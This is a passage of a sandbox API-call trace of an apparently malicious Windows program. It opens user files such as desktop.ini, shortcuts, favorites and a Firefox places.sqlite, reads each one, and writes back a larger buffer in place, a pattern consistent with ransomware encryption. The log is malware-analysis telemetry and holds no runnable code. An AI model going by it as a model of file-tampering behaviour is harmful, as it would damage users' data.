lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.998] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe8 [0179.998] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.998] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.998] ReleaseMutex (hMutex=0x168) returned 1 [0179.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.htm", lpUsedDefaultChar=0x0) returned 11 [0179.998] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x311f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0179.999] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.000] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x670, lpOverlapped=0x0) returned 1 [0180.000] CloseHandle (hObject=0x1f0) returned 1 [0180.000] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.001] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x228 [0180.002] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.002] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.002] ReleaseMutex (hMutex=0x168) returned 1 [0180.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0180.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x1fa53fc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpUsedDefaultChar=0x0) returned 32 [0180.002] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x311f2bc*=0x228, lpOverlapped=0x0) returned 1 [0180.003] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.003] WriteFile (in: hFile=0x1f0, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x311f2d0*=0x7b0, lpOverlapped=0x0) returned 1 [0180.003] CloseHandle (hObject=0x1f0) returned 1 [0180.004] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.005] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.005] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x11a [0180.005] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.005] ReleaseMutex (hMutex=0x168) returned 1 [0180.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.005] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ec8178, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec8178*, lpNumberOfBytesRead=0x311f2bc*=0x11a, lpOverlapped=0x0) returned 1 [0180.006] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.007] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0180.007] CloseHandle (hObject=0x1f0) returned 1 [0180.007] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.008] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.008] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x85 [0180.008] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.008] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.009] ReleaseMutex (hMutex=0x168) returned 1 [0180.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Home.url", lpUsedDefaultChar=0x0) returned 21 [0180.009] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x311f2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.010] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.010] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.010] CloseHandle (hObject=0x1f0) returned 1 [0180.011] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.011] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.011] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x85 [0180.012] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.012] ReleaseMutex (hMutex=0x168) returned 1 [0180.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News.url", lpUsedDefaultChar=0x0) returned 14 [0180.012] ReadFile (in: hFile=0x1f0, lpBuffer=0x2673898, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x311f2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.013] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.013] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.013] CloseHandle (hObject=0x1f0) returned 1 [0180.014] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.015] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x16b [0180.016] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.016] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.016] ReleaseMutex (hMutex=0x168) returned 1 [0180.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecentPlaces.lnk", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecentPlaces.lnk", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RecentPlaces.lnk", lpUsedDefaultChar=0x0) returned 16 [0180.016] ReadFile (in: hFile=0x1f0, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x311f2bc*=0x16b, lpOverlapped=0x0) returned 1 [0180.018] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.018] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6f3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x6f3, lpOverlapped=0x0) returned 1 [0180.018] CloseHandle (hObject=0x1f0) returned 1 [0180.018] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.019] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.019] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7e9 [0180.019] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.019] ReleaseMutex (hMutex=0x168) returned 1 [0180.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Reader X.lnk", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Reader X.lnk", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe Reader X.lnk", lpUsedDefaultChar=0x0) returned 18 [0180.019] ReadFile (in: hFile=0x1f0, lpBuffer=0x2878b08, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesRead=0x311f2bc*=0x7e9, lpOverlapped=0x0) returned 1 [0180.020] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.020] WriteFile (in: hFile=0x1f0, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xd71, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x311f2d0*=0xd71, lpOverlapped=0x0) returned 1 [0180.021] CloseHandle (hObject=0x1f0) returned 1 [0180.021] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.284] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.284] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x36c [0180.284] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.284] ReleaseMutex (hMutex=0x168) returned 1 [0180.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecordedTV.library-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecordedTV.library-ms", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RecordedTV.library-ms", lpUsedDefaultChar=0x0) returned 21 [0180.285] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x311f2bc*=0x36c, lpOverlapped=0x0) returned 1 [0180.521] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.521] WriteFile (in: hFile=0x1f0, lpBuffer=0x3d0bb18*, nNumberOfBytesToWrite=0x8f4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3d0bb18*, lpNumberOfBytesWritten=0x311f2d0*=0x8f4, lpOverlapped=0x0) returned 1 [0180.521] CloseHandle (hObject=0x1f0) returned 1 [0180.521] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.533] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.533] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x50 [0180.533] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0180.533] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.533] ReleaseMutex (hMutex=0x168) returned 1 [0180.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.533] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f9e748, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9e748*, lpNumberOfBytesRead=0x311f2bc*=0x50, lpOverlapped=0x0) returned 1 [0180.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0180.535] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5d8, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5d8, lpOverlapped=0x0) returned 1 [0180.535] CloseHandle (hObject=0x1d8) returned 1 [0180.535] GetCurrentThreadId () returned 0x8fc [0180.535] GetCurrentThreadId () returned 0x8fc [0180.535] GetCurrentThreadId () returned 0x8fc [0180.535] SetEvent (hEvent=0xc4) returned 1 [0180.535] RtlExitUserThread (Status=0x0) Thread: id = 19 os_tid = 0x94c [0061.783] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.783] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x331f690*="RacDatabase.sdf") returned 0x3a [0061.783] GetLastError () returned 0x20 [0061.783] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i̱폈H̱퐔H̱") returned 0x51 [0061.783] LocalFree (hMem=0x696c00) returned 0x0 [0061.784] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0061.784] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0061.784] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0061.784] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0061.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf")) returned 0x2020 [0061.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0061.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0061.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xa00000 [0061.785] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0061.785] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.785] ReleaseMutex (hMutex=0x168) returned 1 [0061.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="places.sqlite", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="places.sqlite", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="places.sqlite", lpUsedDefaultChar=0x0) returned 13 [0061.785] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.790] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.793] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.796] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.797] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.799] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, 